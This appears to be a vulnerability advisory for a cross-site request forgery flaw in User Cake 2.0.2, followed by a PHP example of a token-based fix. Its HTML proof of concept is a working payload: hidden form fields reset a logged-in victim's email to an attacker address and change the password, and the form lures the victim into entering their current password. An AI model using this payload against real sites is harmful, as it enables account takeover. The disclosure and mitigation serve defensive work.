source: https://www.securityfocus.com/bid/67604/info
User Cake is prone to a cross-site request-forgery vulnerability because it does not properly validate HTTP requests.
An attacker can exploit this issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
User Cake 2.0.2 is vulnerable; prior versions may also be affected.

<html>
<!-- CSRF Example for userCake -->
<div align="center">
<pre>
<h2><b> userCake CSRF Proof of concept </b></h2>
<h4> Prerequisite: Make sure the user is logged in to the forum before submitting </h4>
<body>
<form
action="http://usercake.com/user_settings.php"
method="POST">
Enter <u>CSRFTest</u> user account password to continue...
Username:<b>CSRFTest</b>
Password:<input type="password" name="password" size="10" required>
<input type="hidden" name="email" value="attacker@email.com"/>
<input type="hidden" name="passwordc" value="HelloWorld"/>
<input type="hidden" name="passwordcheck" value="HelloWorld"/>
<input type="submit" name="submit" value="Submit"/>
</form>
</body>
</pre>
</div>
</html>
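
A server-side mitigation for the missing request validation described above, as an added example (not User Cake's code and not part of the original advisory): a synchronizer token that the settings handler checks before acting. The helper names, the `csrf_token` field and the `$session` array standing in for `$_SESSION` are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers (not User Cake code). $session stands in for $_SESSION
// so the example also runs from the CLI without session_start().

function csrf_issue_token(array &$session): string
{
    // One unpredictable token per session, embedded in the form as a hidden field.
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function csrf_is_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // Reject missing or non-string values, then compare in constant time.
    return is_string($supplied) && $expected !== ''
        && hash_equals($expected, $supplied);
}

function handle_settings_post(array $session, array $post): string
{
    if (!csrf_is_valid($session, $post)) {
        return '403 rejected: missing or wrong CSRF token';
    }
    // ...the existing password check and settings update would run here...
    return '200 accepted';
}

// Constructed session and requests for demonstration.
$session = [];
$token = csrf_issue_token($session);

// Cross-site POST: carries the form fields but cannot know the session's token.
$forged = ['password' => 'x', 'email' => 'new@example.test',
           'passwordc' => 'y', 'passwordcheck' => 'y', 'submit' => 'Submit'];
// Same-site POST: the form rendered by the application included the token.
$legit = $forged + ['csrf_token' => $token];

echo handle_settings_post($session, $forged), PHP_EOL;
echo handle_settings_post($session, $legit), PHP_EOL;
// A token sent as an array (csrf_token[]=a) must also be rejected, not crash.
echo handle_settings_post($session, ['csrf_token' => ['a']] + $forged), PHP_EOL;
```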